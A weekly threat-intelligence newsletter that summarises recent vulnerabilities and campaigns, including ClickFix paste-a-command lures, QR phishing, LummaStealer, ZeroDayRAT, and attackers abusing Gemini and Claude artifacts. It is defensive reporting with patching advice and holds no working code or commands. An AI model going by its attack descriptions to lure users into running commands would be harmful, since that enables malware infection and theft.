Cyber Threat Weekly – #116
The week of February 9th through February 15th, about 375 cyber news articles were reviewed. A light amount of cyber threat trends and adversarial behavior news to share. Been thinkin about the art and science of simplicity.
It’s interesting when you dive into the principle of simplicity. Why art and science? A quote attributed to Albert Einstein “If you can’t explain it simply, you don’t understand it well enough.” Simplification is easier said then done. Speaking simply, breaking things down to manageable easily understood terms. Communicating complex systems simply. It feels like we have a complexity problem in security and tech in general.
Let’s start with Pastebin comments to ClickFix style attack. Another ClickFix style attack, Domain Naming System (DNS) based. Snail mail leads to QR code phishing. Researches provide a deeper dive into QR code phishing.
Claude LLM artifacts + malvertising leading to ClickFix style campaign. BeyondTrust bug exploited after exploit code released. Nations state threat actors abusing Gemini AI model. LummaStealer coming back via CastleLoader and ClickFix.
A sneak peek into Scattered Spiders playbook. New mobile device ZeroDayRAT malware.
Broken Record Alert: Don’t get pwned by N-day vulnerabilities!!!
Known exploited software flaws are one of the top 4 initial access vectors and have increased sharply in recent months. We continue to share n-day vulnerabilities being actively exploited. Priority #1, start with the CISA / VulnCheck known exploited vulnerability (KEV) catalogs. If it’s in the catalog, it should be patched.
A close #2 priority is flaws with weaponized proof of concept (PoC) code available. Exploit chances are higher with weaponized PoC code available. If you do nothing else with patching, have an emergency 24-to-48-hour patching process for actively exploited and weaponized PoC code available vulnerabilities.
VPN gateways from all vendors are under constant attack.
You should consider what is exposed to the Internet. Architecture and zero trust network access (ZTNA) can go a long way to minimizing the number of devices and services exposed to the Internet.
CISA Known Exploited Vulnerabilities – February 9th to February 15th:
CVE-2026-21513 – Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability:
Could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525 – Microsoft Windows NULL Pointer Dereference Vulnerability:
Could allow an unauthorized attacker to deny service locally.
CVE-2026-21510 – Microsoft Windows Shell Protection Mechanism Failure Vulnerability:
Could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533 – Microsoft Windows Improper Privilege Management Vulnerability:
Could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519 – Microsoft Windows Type Confusion Vulnerability:
Could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514 – Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability:
Could allow an authorized attacker to elevate privileges locally.
CVE-2026-20700 – Apple Multiple Buffer Overflow Vulnerability:
Could allow an attacker with memory write the capability to execute arbitrary code. Affects Apple iOS, macOS, tvOS, watchOS, and visionOS.
CVE-2024-43468 – Microsoft Configuration Manager SQL Injection Vulnerability:
An unauthenticated attacker could exploit this vulnerability by sending specially crafted requests to the target environment which are processed in an unsafe manner enabling the attacker to execute commands on the server and/or underlying database.
CVE-2025-15556 – Notepad++ Download of Code Without Integrity Check Vulnerability:
Could allow an attacker to intercept or redirect update traffic to download and execute an attacker-controlled installer. This could lead to arbitrary code execution with the privileges of the user.
CVE-2025-40536 – SolarWinds Web Help Desk Security Control Bypass Vulnerability:
Could allow an unauthenticated attacker to gain access to certain restricted functionality.
CVE-2026-1731 – BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA) OS Command Injection Vulnerability:
Could allow an unauthenticated remote attacker to execute operating system commands in the context of the site user. Successful exploitation requires no authentication or user interaction and may lead to system compromise, including unauthorized access, data exfiltration, and service disruption.
Comments Based ClickFix Attack – Pastebin
While not the first comments style attack, this one stands out a bit. First, it is social engineering through and through. Using comments, promoting a cryptocurrency exploit, and JavaScript for the ClickFix attack. The comments lead to a guide, which provides the directions to execute JavaScript directly in the victim’s web browser.
DNS-Based ClickFix Style Attack
Another unique use of ClickFix style social engineering. This one abuses the cmd prompt by pasting a DNS lookup command to attacker owned infrastructure. The downloaded payload initiates an attack chain ultimately leading to a remote access trojan malware.
https://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html
Crypto_Theft via Snail Mail and QR Codes
While this campaign target crypto theft, this technique can e used across the board for pretty much anything. The goal for attackers to social engineer victims into taking an action. Snail mail is unassuming, sends victims to cell phones which often have minimal protections.
Researchers Dive into QR Code Phishing
QR codes are a great way for attackers to catch victims off guard. We are used to seeing them everywhere, attackers know this and take advantage. By moving traffic to mobile phones, there is a greater chance of attack success.
https://unit42.paloaltonetworks.com/qr-codes-as-attack-vector/
Legit Infrastructure (LLM Artifacts) + Malvertising = ClickFix
The attack on legit resources continues, this time the combo of malvertising and Claude artifacts. Even Medium articles were abused. Each providing instructions on pasting a shell command into the Terminal on Mac devices.
After Exploit Code Released, BeyondTrust Bug Targeted
This one is for tracking purposes. It’s been the case for years; threat actors go after bugs shortly after proof-of-concept (PoC) code is released. We are really interested in the behavior either reverse engineering patches or exploiting bug after exploit release. We can plan our operations accordingly.
Nation State Threat Actors Abusing Gemini
We seen several reports around how threat actors are abusing frontier large language models to aid in attacks. Google has released a report detailing more activity around using generative AI for reconnaissance, malware, and more.
https://www.infosecurity-magazine.com/news/nation-state-hackers-gemini-ai/
CastleLoader + ClickFix = LummaStealer Infections Surging
After law enforcement take down and severe disruption, it appears LummaStealer is coming back and spreading rapidly. CastleLoader is a capable malware loader that decrypts, loads, and executes LummaStealer in memory.
https://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader
Scattered Spiders Playbook via Incident Response
Researchers share some of the behavior of this infamous threat group. The players may change, largely English speakers from a loose group called “The Com” but their use of social engineering and living off the land are worth digging into.
https://unit42.paloaltonetworks.com/muddled-libra-ops-playbook/
ZeroDayRAT Malware – Spyware, Surveillance, and Info-Stealing
Near nation state level capabilities, packaged up and sold on Telegram. Everything needed for account takeover, financial or cryptocurrency theft, SMS message interception (think 2FA), and more. While pricey at $2,000, this is a commoditized capability accessible to many.
https://www.darkreading.com/threat-intelligence/zerodayrat-brings-commercial-spyware-to-mass-market
https://iverify.io/blog/breaking-down-zerodayrat—new-spyware-targeting-android-and-ios
31337 InfoSec - Cyber Threat Weekly - Derek Krein Newsletter
Join the newsletter to receive the latest updates in your inbox.
Comments
Sign in to join the conversation.
Just enter your email below to receive a login link.
